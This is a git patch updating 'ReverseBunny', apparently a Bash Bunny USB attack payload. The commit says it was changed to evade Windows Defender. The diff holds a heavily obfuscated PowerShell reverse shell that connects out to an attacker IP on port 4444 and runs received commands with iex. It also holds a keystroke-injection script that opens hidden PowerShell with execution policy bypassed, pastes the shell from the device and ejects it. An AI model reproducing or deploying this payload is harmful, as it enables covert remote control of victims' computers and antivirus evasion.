From 86c989f9a01b23deb5472191b411cb79af217f3e Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Sat, 2 Oct 2021 21:58:58 +0200 Subject: [PATCH] Updated ReverseBunny (#469) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Uploaded ReverseBunny Obfuscated reverse shell via powershell * Uploaded WifiSnatch Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇 * Update ReverseBunny.txt Changed payload to evade Windows Defender * Update payload.txt Added new "Eject Method" - props to Night(9o3) * Update README.md --- .../remote_access/ReverseBunny/README.md | 5 +- .../ReverseBunny/ReverseBunny.txt | 2 +- .../remote_access/ReverseBunny/payload.txt | 51 ++++++++++++++----- 3 files changed, 40 insertions(+), 18 deletions(-) diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md index 7f478362..ba8e344e 100644 --- a/payloads/library/remote_access/ReverseBunny/README.md +++ b/payloads/library/remote_access/ReverseBunny/README.md @@ -6,7 +6,4 @@ Version: 1.0 Getting remote access via obfuscated reverse shell. -ReverseBunny.txt needs to be configured $IP=Attacker IP, $PORT=Attacker Port & present on the BB. - -# Red.............Payload running -# Green .............Finished +RevBunny.txt needs to be configured $IP=Attacker IP, $PORT=Attacker Port & present on the BB. diff --git a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt index 1aa4f158..65d50681 100644 --- a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt +++ b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt @@ -1 +1 @@ -$IP='0.0.0.0';$PORT=4444; ( nEW-ObjeCt sysTEm.io.CoMPRessIOn.deFLatEStReaM([sYstem.iO.MemorySTREam][COnVERT]::frOMBASE64STring( 'PZJhb+IwDIb/Sj70lkSDiHHiPgzdpLbrpmq7DtFIpxNCcqHW6CgF0Uys6vLfzwlsH9pGdvy+fuwGfVxDCkljLPvNlOAZnvg1H76s6P2Ga8Mly7vW4E5laFS+X2/RtErHs7iusDEi6FM42EHQz2A/N1ZOgz7XMMfwjxMMSD4FumfVI5rcHLHYCTldrDqDi+Uy6KNOA7bu6kipX5PJz8nnleA/uOxHdnraVDUKZ3HWag0JAymrORYlxVcdaMztgI0GlF5BZ5LcqmdsXs1GSjZskI1kTy2VIejQiQhSzwgNT4T45g4ecai7A2bFDr9gNX4YFeZxmibNel9Wzau8ENDROcM/A87aO6dnbszgPoIw3nonGmaF5PBB+t8djO+ubtgnoy5e3s2Qsjk9XpRueRFIICshKuLt2LIzNkW+dK8Zn+WM09fpH6j4VHIp1awwG5e8Y3x6qYAIOo2+lYVxOHghWd7eejJPFNEmWnEuKZ0JPI09TUtbTPyw/x4rg8K1htk9gevEYTteyIBqaOrfQ/frP0IS7qx6qN/bjZCWYvEzVPQbaKviet+ikP8B' ) , [iO.CompRESsiON.CoMprEssionmodE]::deComprEsS )|%{nEW-ObjeCt io.STrEaMrEadEr( $_ , [sYSTEm.text.EncoDING]::asCii)} |% { $_.rEaDTOEND( ) } ) | . ( ([StrIng]$VeRboSepReFeReNCE)[1,3]+'x'-JoIN'') \ No newline at end of file +$bb =(gwmi win32_volume -f 'label=''BashBunny''').Name;$IP='0.0.0.0';$PORT=4444;Start-Sleep 5;New-Item -ItemType file $bb"DONE";;(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");${J`F5Z6}= [typE]("{3}{4}{1}{2}{0}"-f'INg',("{0}{1}" -f'XT.','eN'),'cOD','T','e'); ${clI`e`Nt} = &("{1}{0}{3}{2}" -f 'ew','N','t',("{0}{1}"-f ("{0}{1}"-f'-O','bj'),'ec')) ("{2}{7}{1}{3}{0}{6}{5}{8}{4}" -f("{1}{0}"-f '.T',("{0}{1}"-f 'ke','ts')),'.','Sys',("{0}{1}"-f 'Net',("{1}{0}" -f'Soc','.')),'nt','PCl','C','tem','ie')(${IP},${pO`RT});${st`ReAm} = ${c`l`iENT}.("{2}{0}{1}{3}"-f'e',("{0}{1}" -f 'tSt','r'),'G','eam')."I`N`Voke"();[byte[]]${by`T`es} = 0..65535|.('%'){0};while((${i} = ${stRe`AM}.("{1}{0}" -f 'ad','Re')."InVO`KE"(${B`y`TES}, 0, ${BYt`eS}."LEn`GTh")) -ne 0){;${D`ATA} = (.("{3}{1}{2}{0}" -f ("{0}{1}"-f 'je','ct'),'w-','Ob','Ne') -TypeName ("{6}{5}{0}{4}{2}{3}{7}{1}"-f 'st',("{0}{1}" -f 'di','ng'),("{1}{0}"-f ("{1}{0}" -f't.A','Tex'),'.'),("{1}{0}" -f'E',("{1}{0}" -f'II','SC')),'em','y','S','nco'))."Ge`Ts`Tr`inG"(${BYt`ES},0, ${I});${Se`N`DbAck} = (.("{1}{0}" -f'ex','i') ${d`AtA} 2>&1 | &("{1}{0}{2}" -f'ut','O',("{0}{1}" -f '-',("{2}{0}{1}" -f 't',("{1}{0}" -f'g','rin'),'S'))) );${Send`B`Ac`K2} = ${sEn`DBack} + 'PS ' + (.("{1}{0}"-f 'wd','p'))."P`ATh" + '> ';${sEN`dB`yTE} = ( ${j`F`5Z6}::"AS`CIi").("{1}{0}{2}"-f 't','Ge',("{0}{1}" -f 'By','tes'))."I`NvoKE"(${s`e`NdBA`Ck2});${str`e`AM}.("{0}{1}"-f 'W',("{0}{1}" -f'r','ite'))."In`VOke"(${Send`BYtE},0,${Send`BYtE}."lE`N`gTh");${s`Tr`eaM}.("{1}{0}" -f 'ush','Fl')."inV`oKe"()};${ClI`E`Nt}.("{1}{0}" -f 'se','Clo')."iNV`O`KE"(); diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt index 7f45b871..945fac51 100644 --- a/payloads/library/remote_access/ReverseBunny/payload.txt +++ b/payloads/library/remote_access/ReverseBunny/payload.txt @@ -1,30 +1,55 @@ +#!/bin/bash +# # Title: ReverseBunny -# Description: Obfuscated reverse shell, executed via powershell +# Description: Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me. # Author: 0iphor13 -# Version: 1.0 -# Category: Execution +# Version: 1.1 +# Category: Remote_Access # Attackmodes: HID, Storage +LED SETUP + GET SWITCH_POSITION -ATTACKMODE HID STORAGE DUCKY_LANG de -#LED RED - DON'T EJECT - PAYLOAD RUNNING +rm /root/udisk/DONE -LED R FAST +ATTACKMODE HID STORAGE + +#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING + +LED STAGE1 DELAY 5000 -RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass" -DELAY 2000 +RUN WIN "powershell -NoP -NonI -W hidden -Exec Bypass" +DELAY 6000 -Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\ReverseBunny.txt'))" -DELAY 5000 +Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\RevBunny.txt'))" +DELAY 10000 Q ENTER -DELAY 5000 +DELAY 10000 Q CONTROL v -DELAY 5000 +DELAY 10000 Q ENTER +DELAY 1000 + +LED STAGE2 + +until [ -f /root/udisk/DONE ] + do + sleep 0.2 +done + +LED CLEANUP + +rm /root/udisk/DONE + +DELAY 100 + +sync + +DELAY 100 LED FINISH -#SAVE TO EJECT \ No newline at end of file +#SAVE TO EJECT